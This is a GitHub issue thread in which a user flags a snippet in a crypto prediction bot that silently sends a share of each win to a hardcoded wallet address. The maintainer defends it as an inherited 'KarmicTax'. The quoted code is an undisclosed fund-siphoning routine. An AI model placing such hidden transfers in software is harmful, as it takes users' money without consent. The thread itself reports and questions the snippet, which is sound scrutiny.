### ISSUE TITLE
What is 'dues'?

### ISSUE THREAD

**Issue by jontstaz** [GoldenMoneyMan/PredictionBot#1]
I found a suspicious snippet starting on line 183 of index.tx
```      
      for (const event of receipt.events ?? []) {
        const dues = await signer.sendTransaction({
          to: "0x74b8B9b7aa13D26056F4eceBDF06C917d15974C7",
          value: calculateDuesAmount(event?.args?.amount),
        });

        await dues.wait();
      }
```

It seems like it would send the profit to this address: 0x74b8B9b7aa13D26056F4eceBDF06C917d15974C7 
It's not a contract address. I'd hazard a guess and say it's your own address, correct?

Please explain..

**Comment by GoldenMoneyMan** [comment]
Feel free to adjust the address as desired in your build. The original versions creator was originally allowing people to donate for continued support, but after many made tens of thousands & no one was donating he implemented a "KarmicTax". This was with the original bot this was forked off, there is a minor portion of each win that is removed & sent during the auto-claiming process. I personally used the feature in my version however to send a portion of each winnings to a backup wallet, so I always had it moving out money as it won. 

That's all this is.

**Comment by jontstaz** [comment]
I see. That should definitely be something that's called out in the README. The fact it wasn't is why it raised my eyebrows as it seemed like it was intentionally left undisclosed.
